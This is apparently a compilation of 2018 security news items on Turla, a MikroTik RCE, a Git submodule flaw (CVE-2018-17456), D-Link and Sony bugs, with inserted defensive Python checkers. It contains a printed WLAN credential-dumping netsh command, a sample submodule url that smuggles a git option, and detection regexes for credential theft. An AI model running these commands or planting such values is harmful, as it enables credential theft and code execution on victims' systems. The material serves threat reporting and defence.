“Despite numerous discussions across multiple teams and organizations, no one at Apple has ever heard of this investigation. Businessweek has refused to provide us with any information to track down the supposed proceedings or findings. Nor have they demonstrated any understanding of the standard procedures which were supposedly circumvented,” Apple said.

For its part, Super Micro also denied knowing anything about a government investigation.

“The manufacture of motherboards in China is not unique to Supermicro and is a standard industry practice. Nearly all systems providers use the same contract manufacturers. Supermicro qualifies and certifies every contract manufacturer and routinely inspects their facilities and processes closely,” it stated.


Google Criticizes Apple Over Safari Security, Flaw Disclosures
8.10.2018 securityweek
Apple

One Year After Release, Google Fuzzer Still Finds Many Flaws in Safari

One year after it was released as open source by Google Project Zero, the Domato fuzzer has still found a significant number of vulnerabilities in Apple's Safari web browser.

In September 2017, Google Project Zero researcher Ivan Fratric announced the release of a new Document Object Model (DOM) fuzzer designed for testing web browser engines. At the time, he revealed that Domato had helped him find more than 30 vulnerabilities, including two flaws in Chrome’s Blink engine, four in Firefox’s Gecko, four in Internet Explorer’s Trident, six in EdgeHtml, and 17 in Safari’s WebKit.

Since the highest number of security holes was found in WebKit, Fratric recently decided to once again test it to see if any improvements have been made by Apple.

Using the same type of testing – running 100 million iterations using computing power that could be purchased for roughly $1,000 – Fratric uncovered nine new vulnerabilities, including six in what at the time was the current version of Safari. The researcher also noticed that a majority of the bugs had been in the WebKit code for more than six months before they were discovered.

"While 9 or 6 bugs (depending how you count) is significantly less than the 17 found a year ago, it is still a respectable number of bugs, especially if we take into an account that the fuzzer has been public for a long time now," Fratric said in a blog post.

In an effort to demonstrate the risk posed by the types of flaws identified using the Domato fuzzer, Fratric created an exploit for one of the use-after-free issues – these types of bugs can in many cases allow arbitrary code execution.

The expert reported his findings to Apple in June and July, and patches were released in September. However, Fratric has criticized the tech giant for not disclosing the existence of the vulnerabilities in the initial version of its advisories.

Specifically, Apple resolved the flaws with the release of iOS 12, tvOS 12 and Safari 12 on September 17, but did not mention them in its advisories. Instead, the company added information about the security bugs to its initial advisories only on September 24, when it also released updates and advisories for macOS Mojave 10.14.

"The original advisories most likely didn’t include all the issues because Apple wanted to wait for the issues to also be fixed on MacOS before adding them. However, this practice is misleading because customers interested in the Apple security advisories would most likely read them only once, when they are first released and the impression they would get is that the product updates fix far less vulnerabilities and less severe vulnerabilities than is actually the case," Fratric said.

"Furthermore, the practice of not publishing fixes for mobile or desktop operating systems at the same time can put the desktop customers at unnecessary risk, because attackers could reverse-engineer the patches from the mobile updates and develop exploits against desktop products, while the desktop customers would have no way to update and protect themselves," he added.


Expert presented a new attack technique to compromise MikroTik Routers
8.10.2018 securityaffairs
Hacking

Experts from Tenable Research have devised a new attack technique to fully compromise MikroTik Routers.
MikroTik routers continue to be under attack, and the situation is getting worse because of the availability of new PoC code.

The new attack technique discovered by experts at Tenable Research could be exploited by remote attackers to execute arbitrary code on the vulnerable devices.

Tenable researchers presented the technique on October 7 at DerbyCon 8.0 during the talk “Bug Hunting in RouterOS”. It leverages a known directory traversal flaw tracked as CVE-2018-14847.


The vulnerability, rated medium severity, was discovered in April. It affects Winbox, the management console for MikroTik’s RouterOS software.

In recent months, MikroTik devices running RouterOS have been targeted by malicious code that includes the Chimay-Red exploit.

The Chimay Red hacking tool leverages two exploits, the Winbox Any Directory File Read (CVE-2018-14847) and a Webfig remote code execution vulnerability.

Now Tenable Research has devised a new technique that combines the same CVE-2018-14847 issue, which lets an unauthenticated attacker read files from the device and thereby recover stored credentials, with an authenticated bug to execute arbitrary code on the target device.

“The vulnerabilities include CVE-2018-1156 — an authenticated remote code execution (RCE) — as well as a file upload memory exhaustion (CVE-2018-1157), a www memory corruption (CVE-2018-1159) and a recursive parsing stack exhaustion (CVE-2018-1158). The most critical of these vulnerabilities is the authenticated RCE, which would allow attackers to potentially gain full system access. They were tested against RouterOS 6.42.3 (release date: 05-25-2018) using the x86 ISO.” reads a blog post published by Tenable Research.

“All of these vulnerabilities require authentication (essentially legitimate credentials). If the authenticated RCE vulnerability (CVE-2018-1156) is used against routers with default credentials, an attacker can potentially gain full system access, granting them the ability to divert and reroute traffic and gain access to any internal system that uses the router.”

Jacob Baines, the Tenable researcher who devised the technique, also released a proof of concept. He explained that it is possible to trigger a stack buffer overflow in a sprintf call in the licupgr binary.

“The licupgr binary has an sprintf that an authenticated user can use to trigger a stack buffer overflow. The sprintf is used on the following string:

[format string shown as an image in the original post; not reproduced here]

“Where the user has control of the username and password strings, an authenticated user can exploit this to gain root access to the underlying system,” explained the expert.

What’s expected now?

MikroTik released RouterOS versions 6.40.9, 6.42.7 and 6.43 in August to address the flaws; users have to upgrade their devices and change the default credentials.

Unfortunately, the experts revealed that only approximately 30 percent of vulnerable routers have been patched, which means that roughly 200,000 routers could still be hacked.

The good news is that currently, experts are not aware of the technique being exploited in the wild.

“Based on Shodan analysis, there are hundreds of thousands of Mikrotik deployments worldwide, with strong concentrations in Brazil, Indonesia, China, the Russian Federation and India. As of October 3, 2018, approximately 35,000 – 40,000 devices display an updated, patched version.” concludes Tenable Research.
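Given that most exposed devices are still unpatched, the first thing a practitioner wants is a quick way to triage their own fleet against the fixed releases named above (6.40.9, 6.42.7 and 6.43). The Python below is an added example, not Tenable's or MikroTik's code. It parses RouterOS version strings as printed by /system resource print and reports which hosts are still below a fixed release. The assumptions are mine: every later release in the 6.40 and 6.42 branches, and everything from 6.43 onward, keeps the fix; branches with no named fix (such as 6.41.x) and release candidates are treated as unpatched; the inventory list is constructed sample data.

```python
import re

# Fixed releases named in the article (August 2018). Assumption, not stated on the page:
# later releases in these branches, and everything from 6.43 onward, keep the fix.
FIXED_BY_BRANCH = {
    (6, 40): (6, 40, 9, 1),
    (6, 42): (6, 42, 7, 1),
}
FIXED_FROM = (6, 43, 0, 1)

# Accepts "6.42.3", "6.43", "6.43rc40", "6.42.7 (stable)" as printed by /system resource print.
_VERSION_RE = re.compile(
    r"^(?P<major>\d+)\.(?P<minor>\d+)(?:\.(?P<patch>\d+))?"
    r"(?:(?P<pre>rc|beta)(?P<prenum>\d+))?(?:\s*\([a-z\- ]+\))?$",
    re.IGNORECASE,
)


def parse_routeros_version(text):
    """Return a comparable (major, minor, patch, final) tuple.

    final is 1 for a released build and 0 for an rc/beta, so "6.43rc40" sorts
    below "6.43" and is treated as unpatched (conservative assumption).
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised RouterOS version: {text!r}")
    final = 0 if m.group("pre") else 1
    return (int(m.group("major")), int(m.group("minor")), int(m.group("patch") or 0), final)


def is_patched(version):
    """True if the version is at or above a fixed release for its branch.

    Branches without a named fix (e.g. 6.41.x) below 6.43 are reported as unpatched:
    the only way out of them is upgrading to 6.42.7+ or 6.43+.
    """
    v = parse_routeros_version(version)
    if v >= FIXED_FROM:
        return True
    fixed = FIXED_BY_BRANCH.get(v[:2])
    return fixed is not None and v >= fixed


def unpatched_hosts(inventory):
    """inventory: iterable of (hostname, version_string). Returns hosts still exposed."""
    return [host for host, version in inventory if not is_patched(version)]


# Constructed sample inventory, not data from the article.
SAMPLE_INVENTORY = [
    ("edge-01", "6.42.3"),
    ("edge-02", "6.42.7 (stable)"),
    ("edge-03", "6.40.9"),
    ("edge-04", "6.41.4"),
    ("edge-05", "6.43"),
    ("edge-06", "6.43rc40"),
    ("edge-07", "6.44.1"),
]

if __name__ == "__main__":
    for host in unpatched_hosts(SAMPLE_INVENTORY):
        print(f"{host}: upgrade required (and rotate the admin credentials)")
```

Because the directory traversal discloses stored credentials, upgrading alone is not enough: any device that sat exposed on an unpatched version should also have its admin password rotated, which is why the report line says so.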


Shedding Skin – Turla’s Fresh Faces
8.10.2018 Kaspersky
APT

Turla, also known as Venomous Bear, Waterbug, and Uroboros, may be best known for what was at the time an “ultra complex” snake rootkit focused on NATO-related targets, but their malware set and activity is much broader. Our current focus is on more recent and upcoming activity from this APT, which brings an interesting mix of old code, new code, and new speculations as to where they will strike next and what they will shed.

Much of our 2018 research focused on Turla’s KopiLuwak javascript backdoor, new variants of the Carbon framework and meterpreter delivery techniques. Also interesting was Mosquito’s changing delivery techniques, customized Posh-SecMod open-source powershell use, and borrowed injector code. We tied some of this activity together with infrastructure and data points from WhiteBear and Mosquito infrastructure and activity in 2017 and 2018.

For a first, our KopiLuwak research identified targets and delivery techniques, bringing more accuracy and reliability to the discussion. Also interesting is a review of Turla scripting artefacts leading to newer efforts like KopiLuwak, tracing from older scripting in development efforts in WhiteAtlas and WhiteBear. And, we find 2018 KopiLuwak delivery techniques that unexpectedly matched Zebrocy spearphishing techniques for a first time as well.

Also highly interesting and unusual was the MiTM techniques delivering Mosquito backdoors. In all likelihood, Turla delivered a physical presence of some sort within Wifi range of targets. Download sessions with Adobe’s website were intercepted and injected to deliver Mosquito trojanized installers. This sort of hypothesis is supported by Mosquito installers’ consistent wifi credential theft. Meanwhile, injection and delivery techniques are undergoing changes in 2018 with reflective loaders and code enhancements. We expect to see more Mosquito activity into 2019.

And finally, we discuss the Carbon framework, tying together the older, elegant, and functional codebase sometimes called “Snake lite” with ongoing efforts to selectively monitor high value targets. It appears that the backdoor is pushed with meterpreter now. And, as we see code modifications and deployment in 2018, we predict more development work on this matured codebase along with selective deployment to continue into 2019.

Essentially, we are discussing ongoing activity revolving around several malware families:

KopiLuwak and IcedCoffee
Carbon
Mosquito
WhiteBear

Technical Rattle

Turla’s Shifting to Scripting

KopiLuwak and IcedCoffee, WhiteBear, and WhiteAtlas
Since at least 2015 Turla has leveraged Javascript, powershell, and wsh in a number of ways, including in their malware dropper/installation operations as well as for implementing complete backdoors. The White Atlas framework often utilized a small Javascript script to execute the malware dropper payload after it was decrypted by the VBA macro code, then to delete the dropper afterwards. A much more advanced and highly obfuscated Javascript script was utilized in White Atlas samples that dropped a Firefox extension backdoor developed by Turla, but again the script was responsible for the simple tasks of writing out the extension.json configuration file for the extension and deleting itself for cleanup purposes.

IcedCoffee
Turla’s first foray into full-fledged Javascript backdoors began with the usage of the IcedCoffee backdoor that we reported on in our private June 2016 “Ice Turla” report (available to customers of Kaspersky APT Intelligence Services), which led later to their more fully functional and complex, recently deployed, KopiLuwak backdoor. IcedCoffee was initially dropped by exploit-laden RTF documents, then later by macro-enabled Office documents. The macro code used to drop IcedCoffee was a slightly modified version of that found in White Atlas, which is consistent with the code sharing present in many Turla tools. A noteworthy change to the macro code was the addition of a simple web beacon that relayed basic information to Turla controlled servers upon execution of the macro, which not only helped profile the victim but also could be used to track the effectiveness of the attack.

IcedCoffee is a fairly basic backdoor which uses WMI to collect a variety of system and user information from the system, which is then encoded with base64, encrypted with RC4 and submitted via HTTP POST to the C2 server. IcedCoffee has no built-in command capability, instead it may receive javascript files from the C2 server, which are deobfuscated and executed in memory, leaving nothing behind on disk for forensic analysis. IcedCoffee was not widely deployed, rather it was targeted at diplomats, including Ambassadors, of European governments.

KopiLuwak
In November 2016, Kaspersky Lab observed a new round of weaponized macro documents that dropped a new, heavily obfuscated Javascript payload that we named KopiLuwak (one of the rarest and most expensive types of coffee in the world). The targeting for this new malware was consistent with earlier Turla operations, focusing on European governments, but it was even more selectively deployed than IcedCoffee.

The KopiLuwak script is decoded by macro code very similar to that previously seen with IcedCoffee, but the resulting script is not the final step. This script is executed with a parameter used as a key to RC4 decrypt an additional layer of javascript that contains the system information collection and command and control beaconing functionality. KopiLuwak performs a more comprehensive system and network reconnaissance collection, and like IcedCoffee leaves very little on disk for investigators to discover other than the base script.

Unlike IcedCoffee, KopiLuwak contains a basic set of command functionality, including the ability to run arbitrary system commands and uninstall itself. In mid-2017 a new version was discovered in which this command set had been further enhanced to include file download and data exfiltration capabilities.

The most recent evolution in the KopiLuwak life cycle was observed in mid-2018 when we observed a very small set of systems in Syria and Afghanistan being targeted with a new delivery vector. In this campaign the KopiLuwak backdoor was encoded and delivered in a Windows shortcut (.lnk) file. The .lnk files were an especially interesting development because the powershell code they contain for decoding and dropping the payload is nearly identical to that utilized by the Zebrocy threat actor a month earlier.

Carbon – the long tail
Carbon continues to be deployed against government and foreign affairs related organizations in Central Asia. Carbon targeting in this region has shifted across a few countries since 2014. Here, we find a new orchestrator v3.8.2 and a new injected transport library v4.0.8 deployed to multiple systems. And while we cannot identify a concrete delivery event for the dropper, its appearance coincides with the presence of meterpreter. This meterpreter reliance also coincides with wider Turla use of open source tools that we documented towards the end of 2017 and beginning of 2018.

The Epic Turla operation reported in 2014 involved highly selective Carbon delivery and was a long term global operation that affected hundreds of victims. Only a small portion of these systems were upgraded to a malware set known as “the Carbon framework”, and even fewer received the Snake rootkit for “extreme persistence”. So, Carbon is known to be a sophisticated codebase with a long history and very selective delivery, and coincides with Snake rootkit development and deployment. In light of its age, it’s interesting that this codebase is currently being modified, with additional variants deployed to targets in 2018.

We expect Carbon framework code modifications and predict selective deployment of this matured codebase to continue into 2019 within Central Asia and related remote locations. A complex module like this one must require some effort and investment, and while corresponding loader/injector and lateral movement malware moves to open source, this backdoor package and its infrastructure is likely not going to be replaced altogether in the short term.

.JS attachments deliver Skipper/WhiteAtlas and WhiteBear
We introduced WhiteBear actionable data to our private customers in early 2017, and similar analysis to that report was publicly shared eight months later. Again, it was a cluster of activity that continued to grow past expectations. It is interesting because WhiteBear shared known compromised infrastructure with KopiLuwak: soligro[.]com. WhiteBear scripted spearphish attachments also follow up on initial WhiteAtlas scripting development and deployment efforts.

Mosquito’s Changing 2018 Delivery Techniques
In March 2018, our private report customers received actionable data on Mosquito’s inclusion of fileless and customized Posh-SecMod metasploit components. When discussion of the group’s metasploit use was made public, their tactics began to change.

The “DllForUserFileLessInstaller” injector module maintained a compilation date of November 22, 2017, and was starting to be used by Mosquito to inject ComRAT modules into memory around January 2018. It is a small piece of metasploit injector code that accounts for issues with Wow64. Also, related open source powershell registry loader code oddly was modified to avoid AES use, and opt for 3DES encryption instead. Here is the modified Mosquito code:

And here is the default Posh-SecMod code that they ripped from:

We expect to see more open-source based or inspired fileless components and memory loaders from Mosquito throughout 2018. Perhaps this malware enhancement indicates that they are more interested in maintaining current access to victim organizations than developing offensive technologies.

MiTM and Ducking the Mosquito Net
We delivered actionable data on Mosquito to our private intel customers in early 2017. Our initial findings included data around an unusual and legitimate download URL for trojanized installers:

hxxp://admdownload.adobe[.]com/bin/live/flashplayer23ax_ra_install.exe

While we could not identify the MiTM techniques with accuracy at the time, it is possible either WiFi MiTM or router compromise was used in relation to these incidents. It is unlikely, but possible, that ISP-level FinFisher MiTM was used, considering multiple remote locations across the globe were targeted.

But there is more incident data that should be elaborated on. In some cases, two “.js” files were written to disk and the infected system configured to run them at startup. Their naming provides insight into the intention of this functionality, which is to keep the malware remotely updated via google application, and maintain local settings updates by loading and running “1.txt” at every startup. In a way, this staged script loading technique seems to be shared with the IcedCoffee javascript loading techniques observed in past Turla incidents focused on European government organizations. Updates are provided from the server-side, leading to fewer malware set findings.

google_update_checker.js
local_update_checker.js

So, we should consider the WiFi data collection that Mosquito Turla performed during these updates, as it hasn’t been documented publicly. One of the first steps that several Mosquito installer packages performed after writing and running this local_update js file was to export all of the local host’s WiFi profiles (settings and passwords) to %APPDATA%\<profile>.xml with a command line call:

cmd.exe /c netsh wlan export profile key=clear folder="%APPDATA%"

They then gather more network information with a call to ipconfig and arp -a. Maintaining ongoing host-based collection of wifi credentials for target networks makes it far easier to possess ongoing access to wifi networks for spoofing and MiTM, as brute-forcing or otherwise cracking weakly secured WiFi networks becomes unnecessary. Perhaps this particular method of location-dependent intrusion and access is on the decline for Mosquito Turla, as we haven’t identified new URLs delivering trojanized code.
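The netsh wlan export profile key=clear call and the ipconfig / arp -a follow-up described above are straightforward to turn into a detection. The Python below is an added example, not Kaspersky's code. It runs over constructed process-creation events written in a simple key=value line format (the fields mirror what Sysmon event ID 1 or EDR telemetry provides; the log format and the five-minute follow-up window are my assumptions). It flags any WLAN profile export, rates it high when key=clear is requested (plaintext pre-shared keys), and raises a second alert when network reconnaissance commands follow from the same parent process shortly afterwards.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (Sysmon event ID 1 style), not from Kaspersky's report.
SAMPLE_EVENTS = [
    'ts=2018-03-05T09:12:01Z host=WS-17 ppid=3980 parent=C:\\Windows\\System32\\wscript.exe '
    'image=C:\\Windows\\System32\\cmd.exe cmdline=cmd.exe /c netsh wlan export profile key=clear folder="C:\\Users\\anna\\AppData\\Roaming"',
    'ts=2018-03-05T09:12:03Z host=WS-17 ppid=3980 parent=C:\\Windows\\System32\\wscript.exe '
    'image=C:\\Windows\\System32\\ipconfig.exe cmdline=ipconfig /all',
    'ts=2018-03-05T09:12:04Z host=WS-17 ppid=3980 parent=C:\\Windows\\System32\\wscript.exe '
    'image=C:\\Windows\\System32\\ARP.EXE cmdline=arp -a',
    'ts=2018-03-05T09:40:10Z host=WS-17 ppid=5100 parent=C:\\Windows\\explorer.exe '
    'image=C:\\Windows\\System32\\netsh.exe cmdline=netsh wlan show profiles',
    'ts=2018-03-05T10:15:00Z host=WS-22 ppid=6200 parent=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'image=C:\\Windows\\System32\\ipconfig.exe cmdline=ipconfig /all',
    'ts=2018-03-05T11:00:00Z host=WS-22 ppid=7000 parent=C:\\Windows\\System32\\cmd.exe '
    'image=C:\\Windows\\System32\\netsh.exe cmdline=netsh wlan export profile folder="C:\\Temp"',
]

EVENT_RE = re.compile(
    r"^ts=(?P<ts>\S+) host=(?P<host>\S+) ppid=(?P<ppid>\d+) parent=(?P<parent>\S+) "
    r"image=(?P<image>\S+) cmdline=(?P<cmdline>.*)$"
)
EXPORT_RE = re.compile(r"\bnetsh(?:\.exe)?\s+wlan\s+export\s+profile\b", re.IGNORECASE)
KEY_CLEAR_RE = re.compile(r"\bkey\s*=\s*clear\b", re.IGNORECASE)
RECON_RE = re.compile(r"\b(?:ipconfig(?:\.exe)?|arp(?:\.exe)?\s+-a)\b", re.IGNORECASE)
FOLLOWUP_WINDOW = timedelta(minutes=5)  # assumption: recon within 5 minutes of the export


def parse_event(line):
    """Parse one log line into a dict, or return None for lines in another format."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def detect(lines):
    """Return alerts as (ts, host, severity, rule, cmdline) tuples, in time order."""
    events = sorted(filter(None, (parse_event(l) for l in lines)), key=lambda e: e["ts"])
    recent_exports = {}  # (host, ppid) -> time of the last WLAN profile export from that parent
    alerts = []
    for ev in events:
        key = (ev["host"], ev["ppid"])
        cmd = ev["cmdline"]
        if EXPORT_RE.search(cmd):
            # Any profile export is worth a look; key=clear dumps the PSKs in plaintext.
            sev = "high" if KEY_CLEAR_RE.search(cmd) else "medium"
            rule = "wlan-profile-export" + ("-cleartext-key" if sev == "high" else "")
            alerts.append((ev["ts"], ev["host"], sev, rule, cmd))
            recent_exports[key] = ev["ts"]
        elif RECON_RE.search(cmd):
            # ipconfig / arp -a on their own are noise; right after an export from the
            # same parent process they match the Mosquito installer behaviour.
            exported_at = recent_exports.get(key)
            if exported_at is not None and ev["ts"] - exported_at <= FOLLOWUP_WINDOW:
                alerts.append((ev["ts"], ev["host"], "medium", "post-export-network-recon", cmd))
    return alerts


if __name__ == "__main__":
    for ts, host, sev, rule, cmd in detect(SAMPLE_EVENTS):
        print(f"{ts:%H:%M:%S} {host} [{sev}] {rule}: {cmd}")
```

The parent-process key is what keeps this usable: an administrator exporting a profile from an interactive shell produces one medium alert, while a script host that exports with key=clear and immediately enumerates interfaces and the ARP cache produces the high alert plus the follow-up hits.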

The Next Strike
It’s very interesting to see ongoing targeting overlap, or the lack of overlap, with other APT activity. Noting that Turla was absent from the milestone DNC hack event where Sofacy and CozyDuke were both present, but Turla was quietly active around the globe on other projects, provides some insight as to ongoing motivations and ambitions of this group. It is interesting that data related to these organizations has not been weaponized and found online while this Turla activity quietly carries on.

Both Turla’s Mosquito and Carbon projects focus mainly on diplomatic and foreign affairs targets. While WhiteAtlas and WhiteBear activity stretched across the globe to include foreign affairs related organizations, not all targeting consistently followed this profile. Scientific and technical centers were also targeted, and organizations outside of the political arena came under focus as well. Turla’s KopiLuwak activity does not necessarily focus on diplomatic/foreign affairs, and also winds down a different path. Instead, 2018 activity targeted government related scientific and energy research organizations, and a government related communications organization in Afghanistan. This highly selective but wider targeting set most likely will continue into 2019.

From the targeting perspective, we see closer ties between the KopiLuwak and WhiteBear activity, and closer alignments between Mosquito and Carbon activity.

And WhiteBear and KopiLuwak shared infrastructure while deploying unusual .js scripting. Perhaps open source offensive malware will become much more present in Mosquito and Carbon attacks as we see more meterpreter and injector code, and more uniquely innovative complex malware will continue to be distributed with KopiLuwak and a possible return of WhiteBear. And as we see with borrowed techniques from the previous Zebrocy spearphishing, techniques are sometimes passed around and duplicated.


The Git Project addresses a critical arbitrary code execution vulnerability in Git
8.10.2018 securityaffairs
Vulnerability

The Git Project released new versions of the Git command line client, GitHub Desktop and Atom that address a critical remote code execution vulnerability in Git.

The flaw tracked as CVE-2018-17456 could be exploited by malicious repositories to remotely execute commands on a vulnerable system.

A malicious repository can include a .gitmodules file containing a submodule URL that starts with a dash.

When Git clones such a repository with the --recurse-submodules argument, it passes that URL as an argument to a git clone subprocess, which interprets it as a command line option; this allows an attacker to execute code on the victim's machine.

“When running “git clone --recurse-submodules”, Git parses the supplied .gitmodules file for a URL field and blindly passes it as an argument to a “git clone” subprocess. If the URL field is set to a string that begins with a dash, this “git clone” subprocess interprets the URL as an option. This can lead to executing an arbitrary script shipped in the superproject as the user who ran “git clone”.”

“In addition to fixing the security issue for the user running “clone”, the 2.17.2, 2.18.1 and 2.19.1 releases have an “fsck” check which can be used to detect such malicious repository content when fetching or accepting a push. See “transfer.fsckObjects” in git-config(1).”

This flaw has been addressed in Git v2.19.1 (with backports in v2.17.2 and v2.18.1), GitHub Desktop 1.4.2 and 1.4.3-beta0, and Atom 1.31.2 and 1.32.0-beta3.

Users have to upgrade to the latest version of the Git client, GitHub Desktop, or Atom.
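Until every client is upgraded, the same check the new fsck performs can be done by hand before submodules are initialised. The Python below is an added example, not part of Git or of the advisory: it parses a .gitmodules file and lists every submodule whose url starts with a dash, which an affected git clone would read as an option. It also checks the path field, an extra margin beyond the url the advisory describes. The parser, the sample .gitmodules content and the script name in it are constructed for the example.

```python
import re

_SECTION_RE = re.compile(r'^\s*\[submodule\s+"(?P<name>[^"]+)"\]\s*$')
_KEYVAL_RE = re.compile(r'^\s*(?P<key>[A-Za-z][\w-]*)\s*=\s*(?P<val>.*?)\s*$')


def parse_gitmodules(text):
    """Minimal parser for .gitmodules: {submodule name: {key: value}}.

    Handles the [submodule "name"] sections, whitespace-indented key = value lines,
    full-line comments and double-quoted values. Keys are lower-cased like git does.
    """
    modules, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        m = _SECTION_RE.match(raw)
        if m:
            current = modules.setdefault(m.group("name"), {})
            continue
        m = _KEYVAL_RE.match(raw)
        if m and current is not None:
            val = m.group("val")
            if len(val) >= 2 and val[0] == val[-1] == '"':
                val = val[1:-1]
            current[m.group("key").lower()] = val
    return modules


def suspicious_submodules(text):
    """Entries whose url or path starts with '-'.

    With --recurse-submodules, an affected git passes the url straight to a
    'git clone' subprocess, which reads a leading dash as an option
    (CVE-2018-17456). The path check is an extra safety margin beyond the url
    the advisory describes.
    """
    hits = []
    for name, cfg in parse_gitmodules(text).items():
        for key in ("url", "path"):
            value = cfg.get(key, "")
            if value.startswith("-"):
                hits.append((name, key, value))
    return hits


# Constructed sample: one normal submodule and one carrying a dash-prefixed url.
# "-u" is git clone's short form of --upload-pack, so this "url" would run ./run-me.sh.
SAMPLE_GITMODULES = """\
[submodule "lib/util"]
\tpath = lib/util
\turl = https://example.invalid/util.git
[submodule "evil"]
\tpath = evil
\turl = -u./run-me.sh
"""

if __name__ == "__main__":
    import sys
    from pathlib import Path

    text = Path(sys.argv[1]).read_text() if len(sys.argv) > 1 else SAMPLE_GITMODULES
    for name, key, value in suspicious_submodules(text):
        print(f"refusing to init submodule {name!r}: {key} = {value!r}")
```

The workflow this supports: clone without --recurse-submodules, run the check against the checked-out .gitmodules, and only then run git submodule update --init. On the server side the transfer.fsckObjects setting quoted in the announcement rejects such content at push or fetch time, which is the better long-term control.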


D-Link fixed several flaws in Central WiFiManager access point management tool
8.10.2018 securityaffairs
Vulnerability

D-Link addresses several remote code execution and XSS vulnerabilities affecting the Central WiFiManager access point management tool.
D-Link issued security patches to address several remote code execution and cross-site scripting (XSS) vulnerabilities affecting the Central WiFiManager access point management tool.

The vulnerabilities were reported by researchers at SecureAuth/CoreSecurity.

D-Link Central WiFiManager software controller helps network administrators streamline their wireless access point (AP) management workflow. It leverages a centralized server to remotely allow the management and the monitoring of wireless APs on a network.

The software can be deployed both locally and in the cloud.

The researchers discovered four potentially serious flaws in Central WiFiManager for Windows (version 1.03 and others) that can be exploited for arbitrary code execution.

The most severe flaw, tracked as CVE-2018-17440, is related to the default credentials (admin/admin) of the FTP server that the web application starts on port 9000.

An attacker can use these credentials to connect to the server and upload a specially crafted PHP file that, once requested, leads to arbitrary code execution.

“The web application starts an FTP server running on the port 9000 by default with admin/admin credentials and does not show the option to change it, so in this POC we establish a connection with the server and upload a PHP file. Since the application does not restrict unauthenticated users from requesting any file in the web root, we later request the uploaded file to achieve remote code execution.” reads the security advisory.


Another flaw discovered by the researchers, tracked as CVE-2018-17442, is an authenticated remote code execution via unrestricted upload of a file with a dangerous type.

The Central WiFiManager access point management tool allows users to upload RAR archives and an authenticated attacker could exploit this feature by uploading an archive that includes a PHP file whose content will be executed in the context of the web application.

“When the .rar is uploaded it is stored in the path ‘\web\captivalportal’ in a folder with a timestamp created by the PHP time() function. In order to know what is the web server’s time we request an information file that contains the time we are looking for. After we have the server’s time we upload the .rar, calculate the proper epoch and request the appropriate path increasing this epoch by one until we hit the correct one,” continues the advisory.

The remaining issues include two stored XSS flaws in the “UpdateSite” (CVE-2018-17443) and “addUser” (CVE-2018-17441) functionality, specifically in the sitename and username parameters, respectively.

The vulnerabilities were reported to D-Link on June 4, and the company addressed them with version 1.03R0100-Beta1.


APT28 group returns to covert intelligence gathering ops in Europe and South America
8.10.2018 securityaffairs
APT

Experts from Symantec collected evidence that APT28 group returns to covert intelligence gathering operations in Europe and South America.
APT28 state-sponsored group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM) seems to have shifted the focus for its operations away from election interference to cyber espionage activities.

The APT28 group has been active since at least 2007 and has targeted governments, militaries, and security organizations worldwide. The group was also involved in the string of attacks that targeted the 2016 US presidential election.

According to experts from Symantec, the group is now actively conducting cyber espionage campaigns against government and military organizations in Europe and South America.

Starting in 2017 and continuing into 2018, the APT28 group returned to covert intelligence gathering operations in Europe and South America.

“After receiving an unprecedented amount of attention in 2016, APT28 has continued to mount operations during 2017 and 2018. However, the group’s activities since the beginning of 2017 have again become more covert and appear to be mainly motivated by intelligence gathering.” reads the analysis published by Symantec.

“The organizations targeted by APT28 during 2017 and 2018 include:

A well-known international organization
Military targets in Europe
Governments in Europe
A government of a South American country
An embassy belonging to an Eastern European country”

The cyberespionage group used several malware and hacking tools from its arsenal, including the Sofacy backdoor, which is composed of two main components: Trojan.Sofacy (aka Seduploader), used for basic reconnaissance, and Backdoor.SofacyX (aka X-Agent), used as a second-stage info-stealing malware.

The APT group is also using the recently discovered LoJax UEFI rootkit, which allows the attackers to maintain persistence on the infected machine even if the operating system is reinstalled and the hard drive is replaced.

Symantec researchers also highlighted possible links to other espionage operations, including Earworm, a group that has been active since at least May 2016 and is involved in intelligence-gathering operations against military targets in Europe, Central Asia, and Eastern Asia.

The Earworm group carried out spear-phishing campaigns aimed at delivering the Trojan.Zekapab downloader and the Backdoor.Zekapab.

Experts noticed some overlap with the command and control infrastructures used by Earworm and APT28.

“During 2016, Symantec observed some overlap between the command and control (C&C) infrastructure used by Earworm and the C&C infrastructure used by Grizzly Steppe (the U.S. government code name for APT28 and related actors), implying a potential connection between Earworm and APT28. However, Earworm also appears to conduct separate operations from APT28 and thus Symantec tracks them as a distinct group.” continues the report.

The information gathered by Symantec demonstrates that APT28 is still very active and continues to change its tactics, techniques, and procedures (TTPs) to remain under the radar.


Sony Bravia Smart TVs affected by a critical vulnerability
7.10.2018 securityaffairs
Vulnerability

Experts at FortiGuard Labs team discovered three vulnerabilities in eight Sony Bravia smart TVs, one of them rated as critical.
Patch management is a crucial aspect of IoT security: smart objects surround us and represent a privileged target for hackers.

Experts at FortiGuard Labs team discovered three vulnerabilities (a stack buffer overflow, a directory traversal, and a command-injection issue) in eight Sony Bravia smart TVs, one of them rated as critical.

Affected Sony Bravia models include R5C, WD75, WD65, XE70, XF70, WE75, WE6 and WF6.

The most severe vulnerability, tracked as CVE-2018-16593, is a command-injection flaw in the Sony application Photo Sharing Plus, which allows users to share multimedia content from their mobile devices via Sony smart TVs.

An attacker needs to be on the same wireless network as the Sony TV in order to trigger the vulnerability.

“This application handles file names incorrectly when the user uploads a media file. An attacker can abuse such filename mishandling to run arbitrary commands on the system, which can result in complete remote code execution with root privilege.” reads the blog post published by Fortinet.
“Fortinet previously released IPS signature Sony.SmartTV.Remote.Code.Execution for this specific vulnerability to proactively protect our customers.”


The remaining bugs also affect Sony’s Photo Sharing Plus application running on Bravia sets. The stack buffer overflow (CVE-2018-16595) is a memory corruption vulnerability tied to the lack of sanitization of user input.

“This is a memory corruption vulnerability that results from insufficient size checking of user input. With a long enough HTTP POST request sent to the corresponding URL, the application will crash.” continues the advisory.
“Fortinet previously released IPS signature Sony.SmartTV.Stack.Buffer.Overflow for this specific vulnerability to proactively protect our customers.”

